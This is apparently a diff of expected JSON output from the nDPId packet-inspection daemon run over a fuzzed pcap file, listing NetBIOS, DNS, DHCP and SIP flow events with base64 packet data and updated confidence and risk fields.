+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1120469540839,"flow_last_seen":1120470637551,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1120469540839,"flow_last_seen":1120470637551,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1120470684859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470684859,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa4UAAIARSsjAqAECwKiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1120470685610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470685610,"pkt":"\/\/\/\/\/\/\/\/AODtA269CABFAABOa4YAAIARTsfAqAECyKgB\/wCJAIkAOltWhUUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":600000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":600000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1120470717078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1120470717078,"pkt":"ADBUADRWAODtAW69CABFAAFIa4cAAIARSsrAqAECwKgBAQBEAEMBNA+RAQEGAAZtDDgAAAAAwKgBAgAAAAAAAAAAAAAAAN\/g7QFuvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADUAAAAAAAAAAAAAAAAAAAAAYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANABjglNjNQEDPQcBAODtAW69DAdkMDAyNDY1UQsAAABkMDAyNDY1LjwITVNGVCA1LjA3CgEPAwYsLi8fISv\/AAAA"}
-00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"d002465","fingerprint":"1,15,3,6,44,46,47,31,33,43","class_ident":"MSFT 5.0"}}
+00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"d002465","fingerprint":"1,15,3,6,44,46,47,31,33,43","class_ident":"MSFT 5.0"}}
 01179{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":1120470717080,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1120470717080,"pkt":"AODtAW69ADBUADRWCABFAAJAAAAAAEAR9VnAqAEBwKgBAgBDAEQCLJ6VAgEGAAZtDDgAAAAAwKgBAsCoAQIAAAAAAAAAAADg7QFuvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABv2gAAAAAAAAAA0QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAEBMwQAAA4QDAdkMDAyNDY1AQT\/9\/8AAwTAqAEBBgTAqAEB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAFAAAAA="}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1120470721915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1120470721915,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADlXM4AAIARWMHAqAEpwKgB\/wCKAYoA0YerEQJM2MCoASkAigC7AAAghU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAABGAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XbkUAAQCA\/AoATEFCMTExAAAAAAAAAAAAAAUBAxAAAA8BVaoA"}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00553{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
